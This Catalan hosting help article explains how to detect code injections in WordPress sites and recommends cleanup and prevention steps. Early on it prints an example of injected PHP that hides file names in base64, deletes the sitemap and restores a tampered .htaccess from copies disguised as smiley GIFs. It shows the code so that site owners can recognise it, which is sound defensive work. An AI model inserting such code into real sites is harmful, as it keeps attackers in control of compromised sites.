Com detectar injeccions de codi al nostre WordPress
El WordPress és el CMS més utilitzat del món. Això fa que les seves actualitzacions, plugins i altres eines siguin les que més suport reben en comparació amb altres eines.
Com que és el més utilitzat amb molta diferència, també és el CMS més atacat, per la qual cosa és força comú trobar-se amb un WordPress infectat.
Si utilitzem una versió antiga de WordPress o algun dels nostres plugins no està el més actualitzat possible, existeix la possibilitat que puguin tenir una vulnerabilitat de seguretat i, per tant, que es pugui injectar codi als fitxers de la nostra pàgina web.
Per poder analitzar el nostre lloc, hem de diferenciar els dos tipus d'infeccions que pot tenir el nostre WordPress:
Infeccions als fitxers, normalment al theme o als plugins. Hi ha infeccions de fitxers que es propaguen i d'altres que no es propaguen.
Infeccions a la base de dades, que es produeixen quan directament s'injecta malware a la base de dades de WordPress.
En aquesta guia mostrarem una sèrie de símptomes que pot patir la nostra web si ha estat infectada, de manera genèrica, ja que poden haver-hi moltíssimes infeccions diferents. Ens centrarem en les infeccions de fitxers, ja que són molt més comunes i genèriques; les de base de dades és millor estudiar-les cas per cas.
IMPORTANT: Tenir els plugins completament actualitzats no garanteix la seguretat de l'allotjament. Tenir WordPress i els seus plugins actualitzats minimitzarà aquestes possibilitats i ens ajudarà a evitar ser infectats per problemes comuns i coneguts, però no garanteix al 100% que no es pugui injectar codi maliciós a causa d'una actualització.
Primer de tot, indicarem com detectar fitxers infectats. En moltes ocasions, es poden identificar només pel nom del fitxer, que pot contenir una sèrie de caràcters sense sentit i força sospitosos. Sovint són .php, adjuntem dos exemples:
ffkoklhu.php
e6b6m5ju.php
No sempre els fitxers infectats són tan evidents, ja que moltes vegades la infecció es fa en fitxers ja existents de la pàgina. Adjuntem el codi injectat d’un d’aquests com a exemple, però tingui en compte que el codi i els diferents tipus d'infeccions poden ser molt variats. Mostrem un exemple:
//ckIIbg$nowHtacFile = base64_decode("Li8uaHRhY2Nlc3M=");$nowIndexFile = base64_decode("Li9pbmRleC5waHA=");
$bkLocalFileIndex1 = './wp-includes/images/smilies/icon_devil.gif';$bkLocalFileHtac1 = './wp-includes/images/smilies/icon_crystal.gif';$sitemap = base64_decode("Li9zaXRlbWFwLnhtbA==");@unlink($sitemap);if($nowHtacFile && file_exists($bkLocalFileHtac1)){if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){@chmod($nowHtacFile,0755);@file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1));@chmod($nowHtacFile,0555);}}En aquest exemple, podem veure el base64_decode (descodificar) i la resta de noms aleatoris (Li9pbmRleC5waHA o //ckIIbg) que no semblen tenir un origen legítim.
IMPORTANT: Cal tenir en compte que modificar el codi de fitxers vitals per a la pàgina pot alterar-ne el funcionament, per la qual cosa es recomana precaució a l’hora d’eliminar línies de codi o contactar amb un programador web perquè revisi el codi.
A més, pot utilitzar aquesta eina de Google per comprovar si detecta contingut no segur al seu hosting:
Això pot passar en intentar accedir a la pàgina principal de WordPress o en entrar a algun enllaç de la pàgina, que automàticament redirigeix a una pàgina externa o de contingut no legítim.
El més probable és que hi hagi alguna infecció de codi en algun dels fitxers de la seva pàgina.
Com resoldre el problema: Com hem indicat, en la majoria de casos aquesta redirecció es deu a alguna injecció directa sobre algun fitxer web, per la qual cosa caldrà fer una anàlisi dels fitxers web per eliminar el codi que genera la redirecció. Es pot fer amb programes d’anàlisi de fitxers, però si amb aquests no es troba la infecció, caldrà revisar manualment el codi de tots els fitxers per trobar la redirecció.
Es recomana instal·lar el plugin Wordfence perquè analitzi regularment el seu lloc.
A cdmon oferim còpies de seguretat dels últims 15 dies per restaurar a un dia abans de la injecció de codi.
És molt comú que una web pugui aparèixer amb contingut spam si la busquem directament a Google. Adjuntem un exemple buscant example.com:
Per comprovar ràpidament si és un problema d’indexació de Google, podem fer la mateixa cerca a un altre motor de cerca com Bing.
Si només passa a Google, és un problema d’indexació d’aquest, i caldrà accedir a Google Search Console i fer que Google reindexi correctament el domini.
IMPORTANT: Si això passa a tots els motors de cerca, recomanem fer una anàlisi dels fitxers web i la base de dades per comprovar si hi ha alguna injecció de codi que afecti el SEO de la pàgina.
El disseny de la web no funciona correctament
Aquest símptoma és més complex de detectar, ja que moltes vegades pot ser degut a incompatibilitats o canvis previs.
Les injeccions que afecten la visualització poden ser molt variades. Gran part provenen dels "themes" de WordPress. Molts temes de codi obert o descarregats de fonts dubtoses poden contenir codi maliciós.
Molts d'aquests "temes", al ser de codi obert o descarregar-se d'un lloc de dubtosa procedència, poden tenir codi injectat, per la qual cosa si utilitzem aquest plugin, podem veure una injecció al nostre WordPress.
Per solucionar-ho, caldrà revisar el codi dels fitxers web i la base de dades per trobar alguna injecció.
Com podem prevenir-ho? Des de cdmon recomanem instal·lar els dos plugins següents com a mesura preventiva i d'anàlisi d'arxius per poder tenir un major control sobre el lloc web.
Recomanem utilitzar un plugin anomenat TAC (Theme Authenticity Checker), que escaneja tots els fitxers dels temes instal·lats i indica si detecta qualsevol codi no lícit:
Web d'informació del plugin: https://wordpress.org/plugins/tac/
Com hem dit, no sempre les injeccions són únicament pels temes. És recomanable tenir els plugins i temes el més actualitzats possible per evitar injeccions per utilitzar una versió antiga.
Per a l'anàlisi dels fitxers web, recomanem utilitzar Wordfence. Adjuntem una guia pas a pas per instal·lar-lo al vostre WordPress:
Web d'informació del plugin: https://es.wordpress.org/plugins/wordfence/
IMPORTANT: Tenir els plugins totalment actualitzats no garanteix la seguretat de l'allotjament. Tenir WordPress i els seus plugins actualitzats minimitzarà aquestes possibilitats i ens ajudarà a evitar ser infectats per problemes comuns i coneguts, però no garanteix al 100% que no es pugui injectar codi per alguna actualització.
També hi ha casos en què es creen usuaris al nostre administrador de WordPress, aquest podria ser un exemple de la gestió d’usuaris d’un WordPress infectat:
Com es pot veure, apareix un llistat d’usuaris que ja només pel nom i el correu associat no semblen legítims.
Has de tenir en compte que si instal·les el WordPress des de l’auto-instal·lador de cdmon, l’usuari també es crea de forma aleatòria, per la qual cosa per verificar quin és l’usuari que tens actiu recomanem utilitzar les dades d’accés que apareixen a la gestió del hosting on està instal·lat.
Suggeriments per procedir: Segurament també hi ha algun codi que permet l’accés a l’administració de la pàgina. El primer que es recomana fer és actualitzar i fer una anàlisi dels fitxers.
A continuació, és recomanable actualitzar la contrasenya de la nostra base de dades per bloquejar el possible accés que puguin tenir:
IMPORTANT: Si modifiques la contrasenya de l’usuari MySQL, hauràs de modificar el fitxer "wp-config.php" i indicar la nova contrasenya en aquest fitxer.
Si després d’això el problema persisteix, és recomanable restaurar una còpia de seguretat d’una data en què la web funcionava correctament o contactar amb un programador expert en injeccions web perquè revisi manualment el codi de la pàgina.
Si el teu lloc web ha estat vulnerat i aconsegueixen enviar correus amb contingut spam, el sistema antispam de cdmon procedirà a desactivar l’enviament de correus via web (no el de les comptes de correu electrònic) per aturar aquesta activitat.
En cas que això succeeixi, contactarem immediatament amb tu per informar-te’n.
Una gran part d’aquests enviaments il·lícits es deuen al fet que el formulari de contacte de la pàgina web no està actualitzat o no té algun tipus de validador, cosa que permet l’enviament massiu de correus. Sempre és recomanable tenir un Captcha instal·lat perquè faci la validació humana dels visitants:
Un altre cas força similar és quan el nostre WordPress s’omple de comentaris spam, això pot ser degut a alguna fallada de seguretat del nostre tema/plugins o per la manca de validació abans esmentada. Per aquests casos, recomanem utilitzar el plugin Akismet, que augmenta la protecció contra l’spam. Al següent enllaç mostrem com instal·lar-lo directament a WordPress:
És possible que en alguna ocasió, en accedir a la teva pàgina web, vegis un missatge com el següent:
Aquest és un missatge de cdmon, és a dir, és un missatge propi del servidor.
Aquest només apareix quan un producte ha caducat, és a dir, el sistema procedeix a desactivar temporalment l’accés a la web i als correus fins que el servei es renovi.
L’altre motiu pel qual pot aparèixer és perquè el nostre sistema de detecció de malware ha detectat algun fitxer amb codi maliciós i, per tant, s’ha procedit a la desactivació temporal de la web fins a la seva revisió. En aquest cas, el nostre sistema d’alertes t’enviarà un correu electrònic a l’adreça de contacte del teu usuari de cdmon amb més informació sobre la desactivació del lloc.
Related Articles
Com actuar si tenim injecció de codi a la web
Què és una injecció de codi? Una injecció de codi o atac de virus a la web, és la intrusió de dades o denegació d'accés a la web. En aquest tipus d'atacs s'intenten modificar fitxers i valors propis del CMS i també de la estructura de la programació ...Com accelerar el nostre WordPress
En moltes ocasions els nostres WordPress triguen una gran quantitat de temps en carregar o simplement volem que sigui el més ràpid possible. Gràcies als següents passos aconseguirem la màxima velocitat que ens permeti la nostra web: Veure càrrega de ...Plugins per augmentar la seguretat del nostre Wordpress
Molts dels plugins/temes i fins i tot les pròpies versions antigues de WordPress poden tenir falles de seguretat en la seva pròpia programació i això fa que puguin tenir injeccions de codi en els arxius del WordPress. És possible augmentar ...Com limitar l'accés al login de wordpress mitjançant ips
Un dels intents d'atac més comuns a qualsevol web basat en Wordpress és tractar d'accedir mitjançant força bruta o denegant el servei a la pantalla d'accés. Una manera de poder protegir qualsevol accés és limitar aquest arxiu des d'una/vàries IPs en ...Com afegir camps personalitzats al formulari de comentaris en Wordpress
Afegir camps personalitzats al formulari de comentaris en el teu lloc de WordPress pot ser molt útil per a recopilar informació addicional dels teus usuaris. En aquesta guia mostrem dues maneres de fer-ho: la primera és utilitzant codi personalitzat ...